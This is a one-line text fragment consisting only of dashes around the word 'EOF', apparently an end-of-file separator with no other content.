-----------------EOF-----------------
